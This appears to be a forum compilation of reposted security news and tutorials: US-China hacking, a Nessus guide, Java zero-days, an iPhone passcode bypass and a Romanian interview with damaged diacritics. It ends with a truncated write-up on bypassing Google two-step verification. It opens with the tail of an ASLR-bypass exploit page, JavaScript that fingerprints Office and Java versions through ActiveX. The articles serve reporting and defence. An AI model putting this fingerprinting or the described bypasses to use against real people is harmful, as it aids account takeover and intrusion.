""; var checka = 0; var checkb = 0; // try { checka = new ActiveXObject("SharePoint.OpenDocuments.4"); } catch (e) {} try { checkb = new ActiveXObject("SharePoint.OpenDocuments.3"); } catch (e) {} // if ((typeof checka) == "object" && (typeof checkb) == "object") offver = "Office2010"; else if ((typeof checka) == "number" && (typeof checkb) == "object") offver = "Office2007"; // return offver; } // // function JavaVersion() { var javver = ""; var javaa = 0; // try { javaa = new ActiveXObject("JavaWebStart.isInstalled.1.6.0.0"); } catch (e) {} // if ((typeof javaa) == "object") javver = "Java6"; // return javver; } // // function SkypeCheck() { var skypever = ""; return skypever; } // // </SCRIPT> </HTML> Sursa: Bypassing Windows ASLR using “skype4COM” protocol handler | GreyHatHacker.NET

[h=1]In Cyberspace, New Cold War[/h][h=6]By DAVID E. SANGER[/h] [h=6]Published: February 24, 2013[/h]WASHINGTON — When the Obama administration circulated to the nation’s Internet providers last week a lengthy confidential list of computer addresses linked to a hacking group that has stolen terabytes of data from American corporations, it left out one crucial fact: that nearly every one of the digital addresses could be traced to the neighborhood in Shanghai that is headquarters to the Chinese military’s cybercommand. That deliberate omission underscored the heightened sensitivities inside the Obama administration over just how directly to confront China’s untested new leadership over the hacking issue, as the administration escalates demands that China halt the state-sponsored attacks that Beijing insists it is not mounting. The issue illustrates how different the worsening cyber-cold war between the world’s two largest economies is from the more familiar superpower conflicts of past decades — in some ways less dangerous, in others more complex and pernicious. Administration officials say they are now more willing than before to call out the Chinese directly — as Attorney General Eric H. Holder Jr. did last week in announcing a new strategy to combat theft of intellectual property. But President Obama avoided mentioning China by name — or Russia or Iran, the other two countries the president worries most about — when he declared in his State of the Union address that “we know foreign countries and companies swipe our corporate secrets.” He added: “Now our enemies are also seeking the ability to sabotage our power grid, our financial institutions and our air traffic control systems.” Defining “enemies” in this case is not always an easy task. China is not an outright foe of the United States, the way the Soviet Union once was; rather, China is both an economic competitor and a crucial supplier and customer. The two countries traded $425 billion in goods last year, and China remains, despite many diplomatic tensions, a critical financier of American debt. As Hillary Rodham Clinton put it to Australia’s prime minister in 2009 on her way to visit China for the first time as secretary of state, “How do you deal toughly with your banker?” In the case of the evidence that the People’s Liberation Army is probably the force behind “Comment Crew,” the biggest of roughly 20 hacking groups that American intelligence agencies follow, the answer is that the United States is being highly circumspect. Administration officials were perfectly happy to have Mandiant, a private security firm, issue the report tracing the cyberattacks to the door of China’s cybercommand; American officials said privately that they had no problems with Mandiant’s conclusions, but they did not want to say so on the record. That explains why China went unmentioned as the location of the suspect servers in the warning to Internet providers. “We were told that directly embarrassing the Chinese would backfire,” one intelligence official said. “It would only make them more defensive, and more nationalistic.” That view is beginning to change, though. On the ABC News program “This Week” on Sunday, Representative Mike Rogers, Republican of Michigan and chairman of the House Intelligence Committee, was asked whether he believed that the Chinese military and civilian government were behind the economic espionage. “Beyond a shadow of a doubt,” he replied. In the next few months, American officials say, there will be many private warnings delivered by Washington to Chinese leaders, including Xi Jinping, who will soon assume China’s presidency. Both Tom Donilon, the national security adviser, and Mrs. Clinton’s successor, John Kerry, have trips to China in the offing. Those private conversations are expected to make a case that the sheer size and sophistication of the attacks over the past few years threaten to erode support for China among the country’s biggest allies in Washington, the American business community. “America’s biggest global firms have been ballast in the relationship” with China, said Kurt M. Campbell, who recently resigned as assistant secretary of state for East Asia to start a consulting firm, the Asia Group, to manage the prickly commercial relationships. “And now they are the ones telling the Chinese that these pernicious attacks are undermining what has been built up over decades.” It is too early to tell whether that appeal to China’s self-interest is getting through. Similar arguments have been tried before, yet when one of China’s most senior military leaders visited the Joint Chiefs of Staff at the Pentagon in May 2011, he said he didn’t know much about cyberweapons — and said the P.L.A. does not use them. In that regard, he sounded a bit like the Obama administration, which has never discussed America’s own cyberarsenal. Yet the P.LA.’s attacks are largely at commercial targets. It has an interest in trade secrets like aerospace designs and wind-energy product schematics: the army is deeply invested in Chinese industry and is always seeking a competitive advantage. And so far the attacks have been cost-free. American officials say that must change. But the prescriptions for what to do vary greatly — from calm negotiation to economic sanctions and talk of counterattacks led by the American military’s Cyber Command, the unit that was deeply involved in the American and Israeli cyberattacks on Iran’s nuclear enrichment plants. “The problem so far is that we have rhetoric and we have Cyber Command, and not much in between,” said Chris Johnson, a 20-year veteran of the C.I.A. team that analyzed the Chinese leadership. “That’s what makes this so difficult. It’s easy for the Chinese to deny it’s happening, to say it’s someone else, and no one wants the U.S. government launching counterattacks.” That marks another major difference from the dynamic of the American-Soviet nuclear rivalry. In cold war days, deterrence was straightforward: any attack would result in a devastating counterattack, at a human cost so horrific that neither side pulled the trigger, even during close calls like the Cuban missile crisis. But cyberattacks are another matter. The vast majority have taken the form of criminal theft, not destruction. It often takes weeks or months to pin down where an attack originated, because attacks are generally routed through computer servers elsewhere to obscure their source. A series of attacks on The New York Times that originated in China, for example, was mounted through the computer systems of unwitting American universities. That is why David Rothkopf, the author of books about the National Security Council, wrote last week that this was a “cool war,” not only because of the remote nature of the attacks but because “it can be conducted indefinitely — permanently, even — without triggering a shooting war. At least, that is the theory.” Administration officials like Robert Hormats, the under secretary of state for business and economic affairs, say the key to success in combating cyberattacks is to emphasize to the Chinese authorities that the attacks will harm their hopes for economic growth. “We have to make it clear,” Mr. Hormats said, “that the Chinese are not going to get what they desire,” which he said was “investment from the cream of our technology companies, unless they quickly get this problem under control.” But Mr. Rogers of the Intelligence Committee argues for a more confrontational approach, including “indicting bad actors” and denying visas to anyone believed to be involved in cyberattacks, as well as their families. The coming debate is over whether the government should get into the business of retaliation. Already, Washington is awash in conferences that talk about “escalation dominance” and “extended deterrence,” all terminology drawn from the cold war. Some of the talk is overheated, fueled by a growing cybersecurity industry and the development of offensive cyberweapons, even though the American government has never acknowledged using them, even in the Stuxnet attacks on Iran. But there is a serious, behind-the-scenes discussion about what kind of attack on American infrastructure — something the Chinese hacking groups have not seriously attempted — could provoke a president to order a counterattack. Sursa: http://www.nytimes.com/2013/02/25/world/asia/us-confronts-cyber-cold-war-with-china.html?_r=0

Using Nessus for Network Scanning Using Nessus for Network Scanning Posted by: InfoSec Institute February 25, 2013 in Tutorials Leave a comment If you are looking for a vulnerability scanner, you might have come across several expensive commercial products and tools with a wide range of features and benefits. If a free, full-featured vulnerability scanner is on your mind, then it’s time you know about Nessus. This article covers installation, configuring, selecting policies, starting a scan, and analyzing the reports using NESSUS Vulnerability Scanner. Nessus was founded by Renuad Deraison in 1998 to provide the Internet community with a free remote security scanner. It is one of the full-fledged vulnerability scanners that allow you to detect potential vulnerabilities in systems. Nessus is the world’s most popular vulnerability scanning tool and is supported by most research teams around the world. The tool is free of cost for personal use in a non-enterprise environment. Nessus uses a web interface to set up, scan, and view reports. It has one of the largest vulnerability knowledge bases available; because of this KB, the tool is very popular. Key features Identifies vulnerabilities that allow a remote attacker to access sensitive information from the system Checks whether the systems in the network have the latest software patches Tries with default passwords, common passwords, on systems account Configuration audits Vulnerability analysis Mobile device audits Customized reporting For more details on the features of Nessus, visit: Nessus Vulnerability Scanner Features | Tenable Network Security. Operating systems that support Nessus Microsoft Windows XP/Vista/7 Linux Mac OS X (10.5 and higher) Free BSD Sun Solaris and many more Installation and configuration You can download the Nessus home feed (free) or professional feed from the following link: Nessus Vulnerability Scanner | Tenable Network Security Once you download the Nessus tool, you need to register with the Nessus official website to generate the activation key, which is required to use the Nessus tool. You can do it from the following link: (Obtain an Activation Code | Tenable Network Security) Click on “Nessus for Home” and enter the required details. An e-mail with an activation key will be sent to your mail. [*]Install the tool. (Installation of the Nessus tool will be quite confusing, so tutorials should be useful).For installation guidelines go to: (http://static.tenable.com/documentation/nessus_5.0_installation_guide.pdf). Check for your operating system and follow the steps mentioned in the PDF. [*] Open Nessus in the browser; normally it runs on port 8834. (http://localhost:8834/WelcomeToNessus-Install/welcome) and follow the screen. [*]Create an account with Nessus. [*]Enter the activation code you have obtained by registering with the Nessus website. Also you can configure the proxy if needed by giving proxy hostname, proxy username, and password. [*]Then the scanner gets registered with Tenable and creates a user. [*]Download the necessary plug-in. (It takes some time to download the plug-in; while you are watching the screen, you can go through the vast list of resources we have for Nessus users). Once the plug-ins are downloaded, it will automatically redirect you to a login screen. Provide the username and password that you have created earlier to login. Running the tool: Nessus gives you lots of choices when it comes to running the actual vulnerability scan. You’ll be able to scan individual computers, ranges of IP addresses, or complete subnets. There are over 1200 vulnerability plug-ins with Nessus, which allow you to specify an individual vulnerability or a set of vulnerabilities to test for. In contrast to other tools, Nessus won’t assume that explicit services run on common ports; instead, it will try to exploit the vulnerabilities. Among of the foundations for discovering the vulnerabilities in the network are: Knowing which systems exist Knowing which ports are open and which listening services are available in those ports Determining which operating system is running in the remote machine Once you login to Nessus using the web interface, you will be able to see various options, such as: Policies–Using which you can configure the options required for scan Scans–for adding different scans Reports–for analyzing the results The basic workflow of Nessus tool is to Login, Create or Configure the Policy, Run the Scan, and Analyze the Results. Policies Policies are the vulnerability tests that you can perform on the target machine. By default, Nessus has four policies. Figure A (Click to Enlarge) Figure (A) shows the default polices that come with Nessus tool. External network scan The policy is preconfigured so that Nessus scans externally-facing hosts that provide services to the host. It scans all 65,535 ports of the target machine. It is also configured with plug-ins required for web application vulnerabilities tests such as XSS. Internal network scan This policy is configured to scan large internal networks with many hosts, services, embedded systems like printers, etc. This policy scans only standard ports instead of scanning all 65,535 ports. Web app tests Nessus uses this policy to detect different types of vulnerabilities existing in web applications. It has the capability to spider the entire website to discover the content and links in the application. Once the spider process has been completed, Nessus starts to discover the vulnerabilities that exist in the application. Prepare for PCI DSS audits This policy has PCI DSS (Payment Card Industry Data Security Standards) enabled. Nessus compares the results with the standards and produces a report for the scan. The scan doesn’t guarantee a secure infrastructure. Industries or organizations preparing for PCI-DSS can use this policy to prepare their network and systems. Apart from these pre-configured policies, you can also upload a policy by clicking on “Upload” or configure your own policy for your specific scan requirements by clicking on “New Policy.” Configuring the policy Click on the Policies tab on the top of the screen Click on the New Policy button to create a new policy Under the General settings tab select the “setting type,” based on the scan requirement, such as Port Scanning, Performance Scanning, etc. Based on this type, Nessus prompts you for different options to be selected. For example, “Port Scanning” has the following options: Figure B (Click to Enlarge) Figure ( shows configuring options for Port Scanning Enter the port scan range. By default, Nessus scans all the TCP ports in the /etc/services file. You can limit the ports by specifying them manually (for example, 20-30). You have different scanners available, such as the Nessus SNMP scanner, SSH scanner, ping remote host, TCP Scanner, SYN scanner, etc. Enable by checking the check box as per the scan requirement. Enter the credentials for the scan to use. You can use a single set of credentials or a multiple set of credentials if you have to. You can also work it out without entering the credentials. The plug-in tab lists a number of plug-ins. By default, Nessus will have all the plug-ins enabled. You can enable or disable all the plug-ins at a time or enable few from the plug-in family as per the scan you’d like to perform. You can also disable some unwanted plug-ins from the plug-in family by clicking on that particular plug-in. Figure C (Click to Enlarge) Figure © shows the sub-plug-ins for the plug-in backdoors In Figure ©, the green indicates the parent plug-in and the blue indicates the sub-plug-ins or the plug-ins under the parent plug-in (backdoor). You can enable or disable by simply clicking on the enabled button. In Policy Preferences, you are provided with a drop-down box to select different types of plug-ins. Select the plug-in based on the scan requirement and specify the settings as per the plug-in requirement. Click “Finish” once completed. For example: configure the database. Figure D (Click to Enlarge) Figure (D) shows the configuration of database settings plug-in Scans Once you are done configuring the policies as per your scan requirement, you need to configure the scan details properly. You can do it under the Scan tab Under the Scan tab, you can create a new scan by clicking “New Scan” on the top right. Then a pop-up appears where you need to enter the details, such as Scan Name, Scan Type, Scan Policy, and Target. Scan Name: The name that you want to give to the scan. Scan Type: You have options to run the scan immediately by selecting “RUN NOW.” Or you can make a template which you can launch later when you want to run the scan. All the templates are moved under the Template tab beside the Scan tab. Scan Policy: Select the policy that you have configured previously in the policies section. Select Target: Enter the target machine that you are planning to test. Depending upon the targets, Nessus takes time to scan the targets. Results Once the scanning process has been completed successfully, results can be analyzed. You can see the name of the scan under the Results section. Click on the name to see the report. Hosts–Specifies all the target systems you have scanned. Vulnerabilities–Displays all the vulnerabilities on the target machine that has been tested. Export Results–You can export the results into various formats such as html, pdf, etc. You can also select an individual section or complete result to export based on your requirement. Let us try an example now I have configured a policy named “Basic Scan.” We have many options while configuring or building the policy, such as port scanners, performance of the tool, advanced, etc. Figure E (Click to Enlarge) Figure (E) shows configuration settings of Port Scanning for the policy “Basic Scan.” You don’t need credentials now, so skip the Credentials tab and move to the Plug-ins tab. You need to configure the specific plug-in as per the requirements of the scan that you want to perform on the remote machine. Figure F (Click to Enlarge) Figure (F) shows the plug-ins I have enabled for the policy “Basic Scan.” I have enabled a few plug-ins for the Windows machine scan. Figure G (Click to Enlarge) Figure (G) shows configuring the scan. I have configured the scan to run instantly with the policy that I have created earlier. And the scan target specifies the IP address I want to scan Once all the details have been entered, click on Create Scan, which shows that the Scan is running, as shown in Figure (H) below: Figure H (Click to Enlarge) Once the scanning has been completed, you can see the results in Results tab. Figure (I) shows the same. Figure I (Click to Enlarge) Double clicking on the title displays the scan results. Figure J (Click to Enlarge) Figure (J) shows the Hosts details. It includes all the targets that you have scanned during the test. Double clicking on the host address displays the vulnerabilities Nessus has identified during the test. You can also click on the Vulnerabilities tab to check out the vulnerabilities. Figure K (Click to Enlarge) Figure (K) shows the Vulnerabilities that Nessus found during its scan. Nessus marks the risk as high, medium, info, etc. Clicking on Vulnerability gives you brief description of it. For example, let us go with the Netstat port scanner, which displays the following information: Figure L (Click to Enlarge) Figure (L) shows the ports opened in the target machine. In the same manner you can analyze complete details by clicking on the vulnerabilities. Nessus also suggests solutions or remedies for the vulnerabilities with a few references. Conclusion Nessus is a tool that automates the process of scanning the network and web applications for vulnerabilities. It also suggests solutions for the vulnerabilities that are identified during the scan. Kamal B is a security researcher for InfoSec Institute. InfoSec Institute is an information security training company that offers popular CEH v8 Ethical Hacking Boot Camps. References http://static.tenable.com/documentation/nessus_5.0_installation_guide.pdf http://static.tenable.com/documentation/nessus_5.0_HTML5_user_guide.pdf http://static.tenable.com/documentation/WhatIsNewNessus5.pdf Sursa: Using Nessus for Network Scanning | ZeroSecurity

[h=1]Another iPhone Passcode Bypass Vulnerability Discovered[/h]by Christopher Brook February 25, 2013, 7:00AM It’s getting hard to keep track of all the bugs piling up for Apple’s iPhone. Now it seems a glitch in the iOS kernel of Apple’s much maligned iOS 6.1 is responsible for yet another passcode bypass vulnerability, the second to surface this month. Attackers can apparently access users' photos, contacts and more by following a series of steps on an iPhone running iOS 6.1.The vulnerability was detailed in a post on the Full Disclosure mailing list late last week by Benjamin Kunz Mejri, founder and CEO of Vulnerability Lab. Similar to the iPhone's passcode vulnerability, the exploit involves manipulating the phone’s screenshot function, its emergency call function and its power button. Users can make an emergency call (911 for example) on the phone and then cancel it while toggling the power on and off to get temporary access to the phone. shows a user flipping through the phone’s voicemail list and contacts list while holding down the power button. From there an attacker could get the phone’s screen to turn black before it can be connected to a computer via a USB cord. The device’s photos, contacts and more “will be available directly from the device hard drive without the pin to access,” according to the advisory.The first half of the exploit borrows heavily from last week’s vulnerability – and the Lab notes this in the caption of the video that documents its proof of concept (“already release by other researcher”). It’s the second bypass – which can be achieved by holding down the power button, the screenshot button and the emergency button – that’s interesting; as it makes the phone’s screen, minus the top bar, go black. From there it can be plugged into a computer and the information can be harvested via iTunes from the phone’s hard drive with read/write access. In the accompanying video, the phone’s images and address book can be viewed on a PC without the user having to enter the phone’s passcode thanks to iTunes’ iPhone sync function. Apple updated iOS 6.1 to 6.1.2 earlier this week but failed to address the recent passcode bug, instead opting to patch an Exchange calendar bug that had long affected users’ phone’s network activity and battery. Last week representatives from Apple told Wall Street Journal’s AllThingsD they were aware of the first passcode bug and were developing a fix for "a future software update.” Sursa: Another iPhone Passcode Bypass Vulnerability Discovered | threatpost

CyberSecurity for the Next Generation: CIS Winners Named! February 25, 2013 Kaspersky Team Three young researchers have made their mark on the cybersecurity world and will now present their work at the final of the ‘CyberSecurity for the Next Generation’ student conference in London. The winning entries were selected from 14 research papers presented in person by their authors at the State Engineering University of Armenia. A jury of university lecturers, IT specialists and Kaspersky Lab experts named Vahram Hrayr Darbinyan’s work “Detecting DDoS attacks on digital publication hosting services” the best. The prize for the research with the greatest practical value went to Maxim Shudrak’s “A new technique and tool for vulnerabilities detection in binary executables”. Vladimir Hovsepyan’s research study “Web application for investigation and analysis of asymmetric cryptographic algorithms” received the award for innovation and originality. The jury also awarded several special prizes for the quality of presentation, social significance of the research, etc. The winners all expressed their delight and surprise with their success, and will be looking to develop their presentation and English language skills between now and the grand finale. Maxim even promised to take an intensive course of English. Congratulations to the winners and best wishes for the final! Even those who didn’t win agreed that participation was very useful – having gained valuable experience and made some interesting new acquaintances. See for yourself in this album: Sursa: CyberSecurity for the Next Generation: CIS Winners Named!

[h=1]ISPs Now Monitoring for Copyright Infringement[/h] By David Kravets 02.25.13 2:04 PM The nation’s major internet service providers on Monday said they are beginning to roll out an initiative to disrupt internet access for online copyright scofflaws. The so-called “Copyright Alert System” is backed by the President Barack Obama administration and was pushed heavily by record labels and Hollywood studios. The plan, more than four years in the making, includes participation by AT&T, Cablevision Systems, Comcast, Time Warner Cable and Verizon. Others could soon join. After four offenses, the historic plan calls for these residential internet providers to initiate so-called “mitigation measures” (.pdf) that might include reducing internet speeds and redirecting a subscriber’s service to an “educational” landing page about infringement. The plan does not prevent content owners from suing internet subscribers. The Copyright Act allows damages of up to $150,000 per infringement. The Center for Copyright Information, the new group running the program, maintains it is not designed to terminate online accounts for repeat offenders. However, the Digital Millennium Copyright Act demands that internet service providers kick off repeat copyright scofflaws. The program monitors peer-to-peer file-sharing services via internet snoop MarkMonitor of San Francisco. The surveillance was to have been deployed sooner. But the various delays included Hurricane Sandy and ISP reluctance to join. Peer-to-peer monitoring is easily detectable. That’s because IP addresses of internet customers usually reveal themselves during the transfer of files. Cyberlockers, e-mail attachments, shared Dropbox folders and other ways to infringe are not included in the crackdown. To be sure, the deal is not as draconian as it could have been. The agreement, heavily lobbied for by the Recording Industry Association of America and the Motion Picture Association of America, does not require internet service providers to filter copyrighted material transiting their networks. U.S. internet service providers and the content industry have openly embraced that kind filtering. The Federal Communications Commission, in crafting its net neutrality rules, has all but invited the ISPs to practice it. On a scofflaw’s first offense, internet subscribers will receive an e-mail “alert” from their ISP saying the account may have been misused for online content theft. On the second offense, the alert might contain an “educational message” about the legalities of online file sharing. On the third and fourth infractions, the subscriber will likely receive a pop-up notice “asking the subscriber to acknowledge receipt of the alert.” Sursa: ISPs Now Monitoring for Copyright Infringement | Threat Level | Wired.com

[h=1]Two More Java Zero Days Found by Polish Research Team[/h]by Christopher Brook February 25, 2013, 3:26PM The seemingly endless list of critical zero day bugs found in Java grew longer today with news that one of the flaws fixed in Oracle’s recent patches for the product is under attack and when that bug is paired with another, separate vulnerability, the sandbox in the latest build of Java can be bypassed.Polish security firm Security Explorations sent details regarding the two vulnerabilities, “issue 54” and “issue 55,” including proof of concept code, to Oracle for review today. Oracle confirmed it has received the information, according to an update to Security Explorations’s bug reporting status page but has not confirmed the flaws. Very little of the attack was officially disclosed by the company but CEO Adam Gowdiak did acknowledge that the vulnerability only affects Java’s SE 7 software – which saw Update 15 released last Tuesday – and according to reports, stems from a problem with Java Reflection API. Gowdiak and his team at Security Explorations have proved adept at finding holes in the much maligned Java over the past year or so. The company previously developed a sandbox escape for versions 5, 6, and 7 of the software last fall before advocating for the removal of the framework. The latest Java vulnerability is apparently unrelated to a separate vulnerability Gowdiak found last fall that Oracle claimed it would wait until February to fix that could’ve given an attacker free reign over a user’s computer by using a malicious Java applet. It’s possible though that the flaw could be related to a similar Java security sandbox bypass technique that was unearthed by Gowdiak in January after Java pushed Update 11 of the product. According to Softpedia, Gowdiak claimed he tested the flaw in the first release of Java 7, along with Updates 11 and 15. In January, Esteban Guillardoy of Immunity Inc., said “attackers could pair that vulnerability with the reflection API with recursion in order to bypass Java security checks.” Apple, Facebook, Microsoft and other high profile companies made headlines last week after acknowledging that a Java vulnerability left the companies open to attack via iPhoneDevSDK, a forum that was hosting malware that was being spread by malicious JavaScript. Sursa: Two More Java Zero Days Found by Polish Research Team | threatpost

INTERVIU Costin Raiu, omul care intr? în intimitatea viru?ilor: „Dac? Octombrie Ro?u ar fi femeie, ar fi complicat? ?i ar vorbi limba rus? la perfec?ie“ 18 februarie 2013, 20:39 „Adev?rul“ a vorbit cu Costin Raiu, Director de Cercetare ?i Analiz? la Kaspersky, despre modul în care s-au transformat viru?ii în ultimii ani ?i care sunt amenin??rile informatice cu care ne-am putea confrunta în 2013. Costin Raiu, Director de Cercetare ?i Analiz? în cadrul firmei de securitate Kaspersky, este de p?rere c? România este pe calea cea bun? în ceea ce prive?te securitatea cibernetic? ?i apreciaz? noua Strategie de Securitate Cibernetic?, aprobat? luna aceasta de CSAT. Analistul a explicat, pentru „Adev?rul”, cum a ac?ionat virusul Octombrie Ro?u ?i a atras aten?ia asupra unui nou atac informatic complex care se folose?te de o vulnerabilitate a programului Adobe Reader. Ce a f?cut, mai exact, virusul Octombrie Ro?u? Cel mai interesant lucru la Octombrie Ro?u sunt victimele. Cele mai multe erau institu?ii diplomatice, guvernamentale, companii de energie, inclusiv energie nuclear?, institu?ii de cercetare ?tiin?ific?, contractori militari ?i firme care se ocup? de industria petrolier? ?i gaze. În mai 2007 au început atacurile ?i erau axate pe extragerea de informa?ii de la victime, informa?ii care putea oferi avantaje geostrategice. De exemplu, s-au ob?inut conversa?iile dintre ambasade, informa?ii confiden?iale de la diverse institu?ii. E interesant c? atacul nu a fost depistat timp de atât de mul?i ani. Au fost mul?i care au v?zut fragmente din puzzle. Dac? Octombrie Ro?u ar fi o femeie, cum a?i descrie-o? Înalt?, complicat? ?i vorbe?te limba rus? la perfec?ie. Prefer? tortul diplomat, dar ?i snack-urile tip „energy bar“. Are o afinitate pentru accesoriile chineze?ti rare ?i c?l?tore?te mult în Europa de Est. S?pt?mâna trecut? unul dintre atacurile cele mai mari au fost date prin programul Adobe Reader. Ce pute?i s?-mi spune?i despre acesta? Din cauza lui nu am dormit. Nu e un atac obi?nuit, e un atac extraordinar de sofisticat care apare cam o dat? pe an. O vulnerabilitate le permite hackerilor s? copiezi ni?te fi?iere pe sistem ?i o a doua le permite s? scape din sandbox. Adobe Reader are un fel de sandbox prin care blocheaz? accesul la sistem. Cine a f?cut atacul este extraordinar de experimentat. Este în cod care verific? s? mearg? pe sisteme cu Adobe Reader în limba arab?, ebraic?, englez? ?i greac?. Nu cunoa?tem deocamdat? efectul. Noi tragem concluzia c? avem de a face cu un atac sponsorizat de un stat, de cel mai înalt nivel. Investi?ia a fost enorm?. Crede?i c? România este preg?tit? s? se apere în fa?a unor astfel de atacuri informatice? E interesant c? Red October a fost depistat în România. De curând, a fost aprobat? în CSAT Strategia de Securitate Cibernetic?, care vine cu o mul?ime de m?suri bune. Statul nu are suficiente resurse financiare s? analizeze astfel de atacuri ?i nici exper?i care s? fie de acela?i nivel cu persoanele care din asta tr?iesc. Cea mai bun? m?sur? din aceast? strategie e faptul c? încurajeaz? colaborarea dintre domeniul public ?i cel privat. Acum dou? s?pt?mâni Comisia European? a anun?at o nou? strategie de securitate cibernetic?. Crede?i c? m?sura a fost luat? prea târziu? Nu a fost luat? prea târziu, a fost luat? la momentul potrivit. Noi am analizat propunerea ?i mi se pare foarte bun?. Am remarcat ?i acolo c? se încurajeaz? formarea de echipe de r?spuns ?i încurajeaz? colaborarea cu domeniul privat. Crede?i c? urm?torul R?zboi Mondial se va purta pe cale informatic?? R?zboiul se poart? deja pe cale informatic?. În momentul de fa??, dac? ne uit?m la conflictele existente, observ?m dou? mari componente. Astfel, avem, pe de o parte, dronele. Sunt mii de drone care încep s? înlocuiasc? infanteria ?i avioanele. Am citit c? Pentagonul antreneaz? mai mul?i pilo?i de drone decât pilo?i de avioane. Avem ?i componenta informatic?. Aici observ?m anumite vârfuri de aisberg. ?tim c? se întâmpl? ceva, dar nu ?tim exact ce. Exemple ar fi viru?ii Flame, Gauss, Duku, Stuxnet. În 2012 a explodat ?i am observat c? statele au declarat c? î?i cresc investi?iile în componenta de r?zboi cibernetic. E mai ieftin ?i ofer? avantaje precum anonimitatea ?i efectele pot fi cel pu?in de devastatoare f?r? pierderi de vie?i umane. http://www.youtube.com/watch?v=t6Qc_-EaaU8&feature=player_embedded La ce s? ne a?tept?m pentru 2013 ?i care este strategia Kaspersky? Vom vedea din ce în ce mai multe atacuri la nivel înalt – sponsorizate de actori statali. Vom vedea mai multe atacuri pe Mac, dar ?i pe Android. Observ?m ?i cre?terea num?rului de atacuri care folosesc elemente criptografice. Acestea sunt importante fiindc? deja ne mut?m pe a?a-zisa „e-guvernare“. Aceste atacuri pot avea efecte uria?e asupra sistemelor de guvernare. Vom vedea ?i o cre?tere a num?rului de atacuri de tip „zero-day“ care constau în utilizarea vulnerabilit??ilor anumitor programe. Care este cel mai periculos tip de malware? Din punctul de vedere al utilizatorului de rând exist? dou? mari clase: troienii care pot fura informa?ii bancare ?i ransomware-ul – troieni care blocheaz? calculatoarele ?i solicit? bani pentru a-l debloca. Am cunoscut o persoan? care a venit la mine ?i mi-a povestit cum a desc?rcat un antivirus fals. Dup? o scanare cu respectivul program i s-a spus c? are 30 de viru?i, a ap?sat pe „cur???“ ?i a ap?rut mesajul c? versiunea gratuit? nu poate ?terge viru?i. Dup? achizi?ionarea variantei pro, dispare orice problem?. Nu sf?tuiesc lumea s? ofere bani în astfel de cazuri, c?ci se rezolv? u?or. Din perspectiva institu?ional? avem atacuri care se bazeaz? pe spionaj economic ?i pe sabotaj la nivelul de infrastructuri critice. Vedem din ce în ce mai multe cazuri. Am v?zut Stuxnet, Red October – spionaj sponsorizat de c?tre un actor statal. În final, cum ar?tau viru?ii de acum 10-15 ani comparativ cu cei din prezent? Un exemplu foarte bun este virusul „Bad Sectors 3428“, pe care l-am analizat într-o noapte. Dac? printai sursa unui virus din 1994, aceasta înc?pea pe 2-3 pagini. Putea fi analizat într-un timp decent. Pe m?sur? ce am analizat mai mul?i viru?i mi-a crescut ?i viteza. În loc de o noapte, îmi lua o or?, apoi 15 minute, apoi 5 minute. În zilele noastre s-a schimbat enorm situa?ia. Este foarte dificil ca un om s? poat? analiza singur un virus din 2012-2013. E nevoie de o echip? de oameni. Dac? ar fi s? print?m sursa unui astfel de virus ar fi nevoie de câteva sute de mii de pagini. Complexitatea a crescut enorm, la fel ?i num?rul viru?ilor. Dac? în 1996 ap?rea câte un virus nou pe s?pt?mân? sau pe lun?, în ziua de azi avem 200.000 de viru?i noi pe zi. Cine este Costin Raiu? Costin Raiu este unul dintre cei mai de seam? exper?i în probleme de cibersecuritate, având peste 18 ani de experien?? în domeniu. Primul antivirus scris de el, în 1994, a fost preluat de compania GeCAD ?i vândut sub numele de RAV. Din 2001, Costin Raiu activeaz? în cadrul firmei Kaspersky iar din 2010 este conduce divizia Global Research & Analysis Team care se ocup? de analizarea celor mai noi amenin??ri ?i dezvoltarea de solu?ii pentru acestea. Descoperi?i mâine mai multe detalii despre viru?ii care ne pot afecta calculatoarele personale ?i alte p?r?i fascinante în interviul complet cu specialistul Kaspersky, Costin Raiu. Sursa: INTERVIU Costin Raiu, omul care intr? în intimitatea viru?ilor: „Dac? Octombrie Ro?u ar fi femeie, ar fi complicat? ?i ar vorbi limba rus? la perfec?ie“ | adevarul.ro

Bypassing Google’s Two-Factor Authentication By Adam Goodman on February 25, 2013 TL;DR – An attacker can bypass Google’s two-step login verification, reset a user’s master password, and otherwise gain full account control, simply by capturing a user’s application-specific password (ASP). (With all due respect to Google’s “Good to Know” ad campaign) Abusing Google’s (not-so-) Application-Specific Passwords Google’s 2-step verification makes for an interesting case study in some of the challenges that go with such a wide-scale, comprehensive deployment of strong authentication. To make 2-step verification usable for all of their customers (and to bootstrap it into their rather expansive ecosystem without breaking everything), Google’s engineers had to make a few compromises. In particular, with 2-step verification came a notion of “Application-Specific Passwords” (ASPs). Some months ago, we found a way to (ab)use ASPs to gain full control over Google accounts, completely circumventing Google’s 2-step verification process. We communicated our findings to Google’s security team, and recently heard back from them that they had implemented some changes to mitigate the most serious of the threats we’d uncovered. Here’s what we found: Application-Specific Passwords Generally, once you turn on 2-step verification, Google asks you to create a separate Application-Specific Password for each application you use (hence “Application-Specific”) that doesn’t support logins using 2-step verification. Then you use that ASP in place of your actual password. In more-concrete terms, you create ASPs for most client applications that don’t use a web-based login: email clients using IMAP and SMTP (Apple Mail, Thunderbird, etc.); chat clients communicating over XMPP (Adium, Pidgin, etc.), and calendar applications that sync using CalDAV (iCal, etc.). Even some of Google’s own software initially required you to use ASPs – e.g. to enable Chrome’s sync features, or to set up your Google account on an Android device. More recently, these clients have generally shifted to using methods along the lines of OAuth. In this model, when you first log in using a new application or device, you get an authorization prompt — including 2-step verification — in a webview; after a successful login, Google’s service returns a limited-access “token”, which is used to authenticate your device/application in the future. Actually, OAuth-style tokens and ASPs are notionally very similar — in each case, you end up creating a unique authorization token for each different device/application you connect to your Google account. Further, each token can be individually revoked without affecting the others: if you lose your smartphone, you can make sure that it no longer has access to your GMail account without having to memorize a new password. So then, the major differences between OAuth tokens and ASPs are: OAuth tokens are created automatically, while ASPs are a thoroughly manual affair. You have to log into Google’s account settings page to create one, and then transcribe (or copy/paste) it into your application. OAuth tokens use a flexible authorization model, and can be restricted to accessing only certain data or services in your account. By contrast, ASPs are — in terms of enforcement — not actually application-specific at all! This second point deserves some more attention. If you create an ASP for use in (for example) an XMPP chat client, that same ASP can also be used to read your email over IMAP, or grab your calendar events with CalDAV. This shouldn’t be particularly surprising. In fact, Eric Grosse and Mayank Upadhyay of Google even call this weakness out in their recent publication about Google’s authentication infrastructure: “Another weakness of ASP is the misimpression that is provides application-limited rather than full-scope account access.” - Authentication at Scale, appearing in IEEE S&P Magazine vol. 11, no. 1 As it turns out, ASPs can do much, much more than simply access your email over IMAP. In fact, an ASP can be used to log into 